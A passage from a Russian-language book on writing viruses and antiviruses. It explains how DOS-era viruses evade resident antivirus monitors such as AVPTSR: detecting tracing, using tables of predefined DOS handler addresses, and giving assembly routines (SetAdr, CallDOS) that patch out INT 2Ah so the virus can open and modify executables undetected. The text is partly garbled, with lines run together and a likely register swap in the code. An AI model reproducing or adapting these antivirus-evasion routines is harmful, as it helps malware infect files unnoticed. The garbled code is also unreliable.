Создаем вирус и антивирус
Шрифт:
;Модифицируем следующую команду. Команда JMP (безусловный
;переход) заменяется на две команды NOP (нет операции)
mov Metka, 9090h
;Переходим, если выполняется немодифицированный код (в случае,
;когда трассировка не ведется), и проходим дальше, если выполняется
;модифицированный код (в случае трассировки)
Metka: jmp NoTrace
Trace:
;Сюда попадем при выявленном факте трассировки
NoTrace:
;Трассировка не ведется – нормальное выполнение программыНаконец, последний гвоздь в гроб идеи использования трассировки забит: «Выставленный флаг трассировки можно выявить косвенно, замаскировав аппаратные прерывания, поместив в [SP-1] контрольное значение и дав инструкцию STI. Тогда по изменению слова в стеке можно судить, было трассировочное прерывание или нет».
Выявив факт трассировки прерывания DOS, мониторы начинают выдавать об этом соответствующие сообщения, поэтому даже не самый опытный пользователь догадается, что кто-то (например, вирус) пытается попасть в систему.
Метод предопределенных адресовПереходим к методу определения оригинального адреса точки входа в DOS, основанному на том, что эти адреса для разных версий и конфигураций DOS имеют в общем
Имея программу, основанную на одном из ранее описанных способов определения реального адреса обработчика DOS, загрузочные дискеты с разными версиями DOS и немного терпения, можно получить примерно вот такую информацию.
Оригинальный обработчик DOS версии 3.30 всегда имеет вид:;Точка 0
2E CS:
891EB800 MOV [00B8],BX
2E CS:
8C06BA00 MOV [00BA],ES
CB RETF;Точка 1
2E CS:
3A26FF0D CMP AH,[0DFF]
77DC JA 1443
80FC51 CMP AH,51
74A1 JZ 140D
80FC64 CMP AH,64
74BA JZ 143A
;Точка 2
Оригинальные обработчики DOS версий 5.0–7.0 очень похожи. В общем случае они состоят из следующих фрагментов: Фрагмент 1 (если он присутствует) всегда располагается в нижних адресах памяти. Большинство алгоритмов трассировки заканчивают работу, достигнув этой точки. Для DOS версий 5.0–6.22 этот фрагмент присутствует, если в CONFIG.SYS есть строка DOS=HIGH (вне зависимости от того, осуществляется ли запуск поддерживающего эту опцию драйвера HIMEM.SYS). Если драйвера нет, то JMP FAR просто указывает на фрагмент 2, размещающийся в нижних областях памяти. Если строки DOS=HIGH нет, то фрагмент 1 вырожден (состоит из одной команды внутрисегментного перехода), и обработчик состоит из фрагмента 2.
;Точка 0
90 NOP
90 NOP
E8CC00 CALL CheckA20
2E CS:
FF2E6A10 J MP FAR NEXTDOSФрагмент 2 может располагаться как в верхних, так и в нижних адресах памяти.
;Точка 1
NEXTDOS:
FA CLI
80FC6C CMP AH,6C
77D2 JA 40D080FC50 CMP AH,50
748E JZ 40A9
;Точка 2
Для DOS 7.0 структура обработчика, в общем, такая же. Исключение – фрагмент 1 присутствует всегда, вне зависимости от содержимого файла CONFIG.SYS. Теперь приведем конкретные значения адресов, полученные для разных случаев:
DOS 7.0 (русская версия)
Точка 0 00C9:0FB2 9090
Точка 1 FF03:41E7 80FA
Точка 2 FF03:420A 1E06
Точка 2А FF03:5333 2ACDDOS 6.20
device=himem.sys
dos=high
Точка 0 0123:109E 9090
Точка 1 FDC8:40F8 80FA
Точка 2 FDC8:411B 1E06
Точка 2A FDC8:41D1 2ACDDOS 6.20
dos=high
Точка 0 0123:109E 03EB
Точка 1 03AC:40F8 80FA
Точка 2 03AC:411B 1E06
Точка 2A 03AC:41D1 2ACDDOS 6.20
Точка 1 002A:40F8 80FA
Точка 2 002A:411B 1E06
Точка 2A 002A:41D1 2ACDDOS 5.0
device=himem.sys
dos=high
Точка 0 0123:109E 9090
Точка 1 FDC8:40EB 80FA
Точка 2 FDC8:410E 1E06
Точка 2A FDC8:41C4 2ACDDOS 5.0
dos=high
Точка 0 0123:109E 03EB
Точка 1 03AC:40F8 80FA
Точка 2 03AC:411B 1E06
Точка 2A 03AC:41D1 2ACDDOS 5.0
Точка 1 002A:40EB 80FA
Точка 2 002A:410E 1E06
Точка 2A 002A:41D1 2ACDDOS 3.30
Точка 0 0070:05DC 892E
Точка 1 0294:1460 3A2E
Точка 2 0294:1480
Точка 2A 0294:151B 2ACDDOS 3.10 Точка 0 0070:0D43
DOS 3.20 Точка 0 0070:17D0
Точка 2 является оптимальной, то есть в нее целесообразнее всего передавать управление, чтобы обойти резидентные антивирусные мониторы. Точка 2A – это позиция инструкции INT 2Ah, которую DOS обязательно выполняет в процессе обработки 21-го прерывания.
В конце каждой строки приведены контрольные слова – на тот случай, если по указанному адресу находится нечто иное.
Борьба с антивирусными мониторами
Современные антивирусные мониторы умеют отслеживать факт прямого обращения программ к DOS.
Защиту 21-го прерывания можно организовать более эффективно, используя метод встраивания в ядро операционной системы. Общепринятая схема такова: в точку входа прерывания INT 21h записывается инструкция JMP FAR на обработчик, который проверяет номер функции на безопасность. Он восстанавливает оригинальные инструкции в точке входа прерывания и вызывает обработчик INT 21h. После возврата управления из прерывания, в точку входа снова записывается инструкция JMP FAR, и управление передается программе, вызвавшей INT 21h.
Здесь описан обычный «сплайсинг» (встраивание), который широко применяется разработчиками вирусов. Отметим, что для перехода не обязательно использовать инструкцию JMP FAR (она занимает 5 байт в памяти и не везде может быть размещена). Вместо нее можно применить INT 3, затратив всего 1 байт. В то же время необходимо обеспечить обработку вызовов с кодами 00h, 4Ch, 31h (они не возвращают управление в исходную точку), а также самовызовов (при завершении процессов посредством INT 27h и INT 20h).
Процесс развивается следующим образом. Первый компонент антивирусного монитора встраивается в ядро DOS, а второй – просто перехватывает цепочку 21-го прерывания. Когда программа выполняет инструкцию INT 21h, управление передается второму компоненту. У антивирусных мониторов существует список функций, которые воспринимаются ими как опасные. Они могут сделать проверку на наличие заданной функции в этом списке, затем выставить флаг «проход цепочки» и передать управление дальше. Когда первый компонент получает управление, он проверяет флаг «прохода цепочки». Если он выставлен, то была инструкция INT 21h, поэтому необходимо сбросить флаг «проход цепочки» и передать управление в DOS. Если флаг сброшен, это значит, что был выполнен прямой вызов. В этом случае требуется принимать соответствующие меры против возможных действий вируса.
Эта идея исключительно проста и эффективна. В том или ином виде ее применяют почти все современные
После трассировки прерывания выполняется обращение к DOS по оригинальному адресу. Программа AVPTSR перехватывает обращение. Точнее, AVPTSR перехватывает INT 2Ah, причем этот вызов произведен из INT 21 h, вблизи начала фрагмента. Обработчик INT 08h, то есть таймера, периодически восстанавливает вектор 2Ah, если он был отключен.
Подразумевается, что флаг прохода цепочки 21-го прерывания проверяется в обработчике INT 2Ah.
Конструирование неотслеживаемого обращения к DOS
Для чего нужно такое конструирование? Неужели антивирусные мониторы настолько бдительны, что пресекают любые попытки открыть для модификации EXE– или СОМ-файл? Да, это действительно так. Авторы антивирусных мониторов обладают достаточно эффективными средствами, чтобы предотвратить прямые обращения к DOS со стороны вирусов.
Обратимся к мнению Ю. Косивцова: «Для обнаружения действия нерезидентных вирусов необходимо контролировать вызов функций DOS с номерами: 3Dh (открытие файла через описатель), 0Fh (открытие файла через FCB и 5Dh) и подфункцию 00h (косвенный вызов DOS). Если при открытии файла обнаружено, что расширение его СОМ, ЕХЕ или SYS, то можно выдавать предупреждающее сообщение».
Список выглядит слишком коротким. Действительно, а что произойдет, если сначала переименовать программный файл? И почему не учтена функция 6Ch (расширенное открытие файла)? А что будет, если открыть файл для чтения, а затем изменить режим доступа прямым обращением к SFT?
Конечно же, авторы антивирусных мониторов не столь наивны. Просто они никогда не раскрывают свои профессиональные секреты. Например, авторы программы AVPTSR реально учли и использовали все эти методики и тонкости.
Итак, предположим, что гипотетический антивирусный супермонитор:
– отслеживает и блокирует попытки трассировки 21-го прерывания;
– для контроля «опасных» функций DOS встраивается в начало обработчика прерывания INT 21h;
– для предотвращения прямого обращения к DOS использует флаг, сбрасываемый либо во вставленном фрагменте, либо в обработчике прерывания 2Ah (более грамотный подход).
Эти действия монитора порождают соответствующие проблемы при конструировании неотслеживаемого обращения к DOS.
Первая проблема достаточно просто решается с использованием «метода предопределенных адресов».
Для решения второй проблемы стоит проанализировать возможное расположение в обработчике DOS точки перехода на антивирусный монитор. Очевидно, это может быть точка 0 либо точка 1. В самом худшем случае можно допустить, что врезка происходит непосредственно после команды проверки на максимальное значение номера функции. Далее обработчик DOS «растекается» на многочисленные ручейки, поэтому отследить их все крайне затруднительно. По крайней мере, обработчики функций 0Fh, 3Dh и 5Fh попадают в разные ручейки. Однако, при использовании ограниченного набора функций они могут разместиться и в одном ручейке, что намного упростит решение данной задачи. Функции 3Ch-43h, отвечающие за создание, открытие, закрытие, чтение, запись, атрибуты и перемещение, действительно располагаются в одном общем ручейке. Это позволяет использовать адрес точки 2 для прямого обращения к DOS. Мониторы, скорее всего, не будут отслеживать эту точку.
Решение третьей проблемы также не вызовет особых затруднений. Один из вариантов – замаскировать прерывания таймера и изменить вектор 8-го прерывания перед прямым обращением к DOS. Вместо изменения вектора можно попробовать вставить инструкции IRET в начало текущего (антивирусного) обработчика. При использовании все того же метода «предопределенных адресов» и, зная позицию инструкции INT 2Ah в обработчике DOS, перед прямым обращением к DOS следует просто заменить этот вызов двумя командами NOP.
Пример реализации
Рассмотрим две подпрограммы, которые используются для прямого обращения к DOS.
Подпрограмма SetAdr предназначена для определения адреса обработчика DOS методом предопределенных адресов. Для версий DOS, «правильный» адрес которых неизвестен, используется функция DOS 35h (получить вектор прерывания).
Подпрограмма CallDOS позволяет обращаться к DOS напрямую. В код включена проверка на номер функции. Для «безопасных» функций предусмотрен обычный вызов DOS при помощи инструкции INT 21h.;Процедура установки адреса (один из самых коротких,
;хотя и подозрительных вариантов реализации)
SetAdr proc near
;Устанавливаем указатель на таблицу в регистре SI
mov si,offset Table
;Читаем очередное значение сегмента и смещения из таблицы
Next:
mov es,[si]
mov bx,[si+2]
;Проверяем контрольный код в слове, адрес которого получен
;из таблицы. Если результат отрицательный, переходим
;к следующему элементу таблицы
cmp es:[bx],2ACDh
jnz Skip
;Сохраняем адрес точки 2A
mov Ofs2A,bx
mov Seg2A,es
;Сохраняем адрес точки 2 из таблицы
mov ax, [si+4]
mov Seg21,ax
mov ax, [si+6]
mov Ofs21,ax
ret
Skip:
;Переходим к следующему элементу таблицы
add si,8
;Проверяем, не закончилась ли таблица. Если таблица закончилась,
;читаем адрес текущего обработчика прерывания
cmp [si], 0
jnz Next
;Читаем адреса текущего обработчика прерывания INT 21h – метод
;”предопределенных адресов” не сработал, точка входа не найдена
mov ax, 3521h
int 21h
mov Ofs21,bx
mov Seg21,es
ret
;Таблица позиций 2A и 2.
Table dw 0FF03h, 5333h,0FF03h, 420Ah
dw 0FDC8h, 41D1h,0FDC8h, 411Bhdw 0
SetAdr endp
;Процедура прямого обращения к DOS
CallDOS proc near
;Если функция безопасна, вызываем прерывание обычным способом
cmp ah,3Bh
jb Trivial
cmp ah,42h
ja Trivial
;Заменяем вызов прерывания 2Аh на две команды NOP (9090h)
;в обработчике DOS, предварительно
;сохранив первоначальные значения кода
push es
push ax
push bx
mov es,cs:Ofs2A
mov bx,cs:Seg2A
mov ax,es:[bx]
mov cs:Save, ax
mov es:[bx], 9090h
pop bx
pop ax
pop es
;Вызываем напрямую прерывание DOS
pushf
call cs:dword ptr Ofs21
;Восстанавливаем вызов 2Аh
push es
push ax
push bx
mov es,cs:Ofs2A
mov bx,cs:Seg2A
mov ax,cs:Save
mov es:[bx], ax
pop bx
pop ax
pop es
ret
;Обычное обращение к DOS (используется для безопасных функций)
Trivial:
int 21h
ret
;В этом месте сохраняем значение для кода вызова INT 2Ah